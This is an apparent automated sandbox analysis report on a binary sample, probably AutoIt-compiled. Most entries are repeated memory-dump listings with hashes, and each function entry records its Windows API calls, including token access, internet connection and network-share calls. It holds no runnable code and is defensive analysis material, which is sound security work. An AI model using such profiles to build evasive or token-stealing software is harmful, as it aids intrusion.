                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1946975507-0
                                                                                                                            • Opcode ID: 5ef4426c8c6865752711ab4c6c19ca9384c3345b36d7247a0ee591ae7f4bec5f
                                                                                                                            • Instruction ID: 4219de152f88f9e5ac2e82b4b0be446f0854dbc1925e8c7a53b8bb72b30ff01a
                                                                                                                            • Opcode Fuzzy Hash: 5ef4426c8c6865752711ab4c6c19ca9384c3345b36d7247a0ee591ae7f4bec5f
                                                                                                                            • Instruction Fuzzy Hash: 0EE03031104144AADB215F64EC0D7DC3B20EB06332F10836BFA79880E187B14AA1DB51
                                                                                                                            APIs
                                                                                                                            • GetCurrentThread.KERNEL32 ref: 00C6871B
                                                                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,00C682E6), ref: 00C68722
                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C682E6), ref: 00C6872F
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,00C682E6), ref: 00C68736
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentOpenProcessThreadToken
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3974789173-0
                                                                                                                            • Opcode ID: 13adfc7f7131261c1fc1dcc6aacdc58425e15816358f2416e94140f389e9358d
                                                                                                                            • Instruction ID: 18ed04cab9b7f8842b1b4b5ad31fd5c3c98c87205ba8ff1d218cd0ba968dd0b3
                                                                                                                            • Opcode Fuzzy Hash: 13adfc7f7131261c1fc1dcc6aacdc58425e15816358f2416e94140f389e9358d
                                                                                                                            • Instruction Fuzzy Hash: 73E086366112119BD7205FB05D4DB5E3BACEF54791F14482DB245C9050DA748456C750
                                                                                                                            APIs
                                                                                                                            • OleSetContainedObject.OLE32(?,00000001), ref: 00C6B4BE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ContainedObject
                                                                                                                            • String ID: AutoIt3GUI$Container
                                                                                                                            • API String ID: 3565006973-3941886329
                                                                                                                            • Opcode ID: d1a863c9d64229d46c489a47473708ce5d4e121c063a9dec6adca0bfcf22ba68
                                                                                                                            • Instruction ID: 7f6e1e8b491d76efa16cc335b89bb033105f9cb686ef193977ef4e97ccaeaaec
                                                                                                                            • Opcode Fuzzy Hash: d1a863c9d64229d46c489a47473708ce5d4e121c063a9dec6adca0bfcf22ba68
                                                                                                                            • Instruction Fuzzy Hash: 37913871600601AFDB24DF64C894BAAB7E9FF49710F20856DF94ACB2A1DB70ED81CB50
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C2FC86: _wcscpy.LIBCMT ref: 00C2FCA9
                                                                                                                              • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
                                                                                                                              • Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC
                                                                                                                            • __wcsnicmp.LIBCMT ref: 00C7B02D
                                                                                                                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00C7B0F6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                            • String ID: LPT
                                                                                                                            • API String ID: 3222508074-1350329615
                                                                                                                            • Opcode ID: 9dec6487fb433983b4659160a2517ff0197c454defc16ac7851fcdf916a1b9bb
                                                                                                                            • Instruction ID: b72ae12764f14357d6795c61cd946fc962ede52bc71589e51b5c30e76bf8b37c
                                                                                                                            • Opcode Fuzzy Hash: 9dec6487fb433983b4659160a2517ff0197c454defc16ac7851fcdf916a1b9bb
                                                                                                                            • Instruction Fuzzy Hash: B5617575A00219AFDB14DF54C895FEEB7B4EF09310F108069F91AAB291DB70AF85DB50
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00C22968
                                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00C22981
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: GlobalMemorySleepStatus
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 2783356886-2766056989
                                                                                                                            • Opcode ID: b70f8d676d19e060566e16f2e83dc2a3627d8ae0c583869b1e9118f45f1debb2
                                                                                                                            • Instruction ID: 4289524a2a9c9db2335bc3a816e0b08ba630470602989ed5ecc5f60e4fb9d3a1
                                                                                                                            • Opcode Fuzzy Hash: b70f8d676d19e060566e16f2e83dc2a3627d8ae0c583869b1e9118f45f1debb2
                                                                                                                            • Instruction Fuzzy Hash: C9513871418744ABE720EF10D886BEFBBE8FF86344F41885DF2D8411A1DB318569EB66
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C14F0B: __fread_nolock.LIBCMT ref: 00C14F29
                                                                                                                            • _wcscmp.LIBCMT ref: 00C79824
                                                                                                                            • _wcscmp.LIBCMT ref: 00C79837
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcscmp$__fread_nolock
                                                                                                                            • String ID: FILE
                                                                                                                            • API String ID: 4029003684-3121273764
                                                                                                                            • Opcode ID: 73cf2b7483399f3475f87cfcfcc9e5f27723fa6f963cfb544ed5f799b376de92
                                                                                                                            • Instruction ID: ee42e2c5a5ada3079313e3f181c15bf59ae02fa2664262f456c3c2600f44b806
                                                                                                                            • Opcode Fuzzy Hash: 73cf2b7483399f3475f87cfcfcc9e5f27723fa6f963cfb544ed5f799b376de92
                                                                                                                            • Instruction Fuzzy Hash: D741D571A00209BBDF249EE4CC45FEFBBBDDF86710F004069F904A7280DA719A45AB61
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00C8259E
                                                                                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C825D4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CrackInternet_memset
                                                                                                                            • String ID: |
                                                                                                                            • API String ID: 1413715105-2343686810
                                                                                                                            • Opcode ID: c3849abe75f26f8e3e0fe4856ae882497b88d6234f91426be78adfca4e5f4d6c
                                                                                                                            • Instruction ID: ce195630bed5bcbaa2c55efd8bce3c0b9dfae4a9c895e2a5db34172ee6536857
                                                                                                                            • Opcode Fuzzy Hash: c3849abe75f26f8e3e0fe4856ae882497b88d6234f91426be78adfca4e5f4d6c
                                                                                                                            • Instruction Fuzzy Hash: 7A311D71800119EBCF11EFA1CC89EEEBFB8FF09314F100159F915A6161EB315996EB90
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00C97B61
                                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C97B76
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend
                                                                                                                            • String ID: '
                                                                                                                            • API String ID: 3850602802-1997036262
                                                                                                                            • Opcode ID: 346d294867a88a0f38c288de21a4193ab69b01987e7d6a5e979b07cf516347f9
                                                                                                                            • Instruction ID: db2ff18d14d35aeb17a1309800ef99cd5f32fb4f43c4731de764f9f52fc25875
                                                                                                                            • Opcode Fuzzy Hash: 346d294867a88a0f38c288de21a4193ab69b01987e7d6a5e979b07cf516347f9
                                                                                                                            • Instruction Fuzzy Hash: E2411774A062099FDF14CF65C985BEEBBB5FB08300F10026AE904AB381D730AA51DF90
                                                                                                                            APIs
                                                                                                                            • DestroyWindow.USER32(?,?,?,?), ref: 00C96B17
                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00C96B53
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$DestroyMove
                                                                                                                            • String ID: static
                                                                                                                            • API String ID: 2139405536-2160076837
                                                                                                                            • Opcode ID: 590af01abf036049ec1c55e311cdb5c5a6eb2366dfd6f4731da337ba944cc2a3
                                                                                                                            • Instruction ID: d780b827b6bc0f9eb0e8ea0f6b86bf122069799b3c5a81b705a71049fa8a86ed
                                                                                                                            • Opcode Fuzzy Hash: 590af01abf036049ec1c55e311cdb5c5a6eb2366dfd6f4731da337ba944cc2a3
                                                                                                                            • Instruction Fuzzy Hash: F9318D71200604AEDF109F64CC84BFB73A9FF48760F108619F9A9D7190DB31AD92E760
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00C72911
                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C7294C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoItemMenu_memset
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 2223754486-4108050209
                                                                                                                            • Opcode ID: a310d6aad6f16bd443122f83afb895ad607e198b4415167916eb1503b99d0e2d
                                                                                                                            • Instruction ID: 10e24410106bcee6bacecceff6be8fae3b25273c4a781ec34c8464768a34dff9
                                                                                                                            • Opcode Fuzzy Hash: a310d6aad6f16bd443122f83afb895ad607e198b4415167916eb1503b99d0e2d
                                                                                                                            • Instruction Fuzzy Hash: 0731E631A003059FEF24DF59DC45BAEBBF8FF45350F188019EAD9A61A0D7709A40DB51
                                                                                                                            APIs
                                                                                                                            • __snwprintf.LIBCMT ref: 00C83A66
                                                                                                                              • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __snwprintf_memmove
                                                                                                                            • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                            • API String ID: 3506404897-2584243854
                                                                                                                            • Opcode ID: d896b01a79809b50fdb65285ceede9071d1415f17c6253441458dd9c928777c8
                                                                                                                            • Instruction ID: 57a6c3c9f690ab97bcd2377e5eaacf762b1f4b279b3f3c454b5e3e5a933ab4f4
                                                                                                                            • Opcode Fuzzy Hash: d896b01a79809b50fdb65285ceede9071d1415f17c6253441458dd9c928777c8
                                                                                                                            • Instruction Fuzzy Hash: 44219331600119AFCF14FFA4CC91EEE77B5AF45740F500468F445A7281DB34EA86EBA5
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C96761
                                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C9676C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend
                                                                                                                            • String ID: Combobox
                                                                                                                            • API String ID: 3850602802-2096851135
                                                                                                                            • Opcode ID: 8a2dd803ad027c1d0aab768f718106093f563c0e9e65c6459b97fb8046081f35
                                                                                                                            • Instruction ID: 814f690ac96abcdd87066f09159f6a416c0beb112fbb0eb9a02e76bc982f0686
                                                                                                                            • Opcode Fuzzy Hash: 8a2dd803ad027c1d0aab768f718106093f563c0e9e65c6459b97fb8046081f35
                                                                                                                            • Instruction Fuzzy Hash: B811B271200208BFEF119F94DC88FFB376AEB493A8F114129F924972D0D6319D5197A0
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C11D73
                                                                                                                              • Part of subcall function 00C11D35: GetStockObject.GDI32(00000011), ref: 00C11D87
                                                                                                                              • Part of subcall function 00C11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C11D91
                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00C96C71
                                                                                                                            • GetSysColor.USER32(00000012), ref: 00C96C8B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                            • String ID: static
                                                                                                                            • API String ID: 1983116058-2160076837
                                                                                                                            • Opcode ID: bce20521d175b1ceb7dd467e612616eb5778566023e088163a52d0b6c25ee407
                                                                                                                            • Instruction ID: be88aac1e909ddd468c8042d7a21d972948b0a74afffaa3796e68e5013f8fc01
                                                                                                                            • Opcode Fuzzy Hash: bce20521d175b1ceb7dd467e612616eb5778566023e088163a52d0b6c25ee407
                                                                                                                            • Instruction Fuzzy Hash: B8212972510209AFDF04DFA8CC49AFA7BA8FB08314F154629FD95D2250D635E861DB60
                                                                                                                            APIs
                                                                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 00C969A2
                                                                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00C969B1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LengthMessageSendTextWindow
                                                                                                                            • String ID: edit
                                                                                                                            • API String ID: 2978978980-2167791130
                                                                                                                            • Opcode ID: c1614dbddcb9c77c1e112d9354c9fc78b9efe73089c019da48bbc98df346dd88
                                                                                                                            • Instruction ID: e1e767756b5d361b798b73c28d5f58b2a6fefbf98c54e8ebbe3e2ec4379b72e2
                                                                                                                            • Opcode Fuzzy Hash: c1614dbddcb9c77c1e112d9354c9fc78b9efe73089c019da48bbc98df346dd88
                                                                                                                            • Instruction Fuzzy Hash: BB116A71510208ABEF109F649C48FEB37A9EB053B8F624728F9B5971E0C635DC91A760
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00C72A22
                                                                                                                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00C72A41
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoItemMenu_memset
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 2223754486-4108050209
                                                                                                                            • Opcode ID: 1f2a2556a2297d6cc763bf7ac1a646c2293b28dc4e0f449d6afc87fb0b23a1cc
                                                                                                                            • Instruction ID: 8324451a4ff0c47630ca8b77822833049f444d9bf7208b762ea79768511e5552
                                                                                                                            • Opcode Fuzzy Hash: 1f2a2556a2297d6cc763bf7ac1a646c2293b28dc4e0f449d6afc87fb0b23a1cc
                                                                                                                            • Instruction Fuzzy Hash: 7811C472D01114ABDF30DB99DC44BAEB7B8EB45320F158026E96DE7290D770EE0AE791
                                                                                                                            APIs
                                                                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C8222C
                                                                                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C82255
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
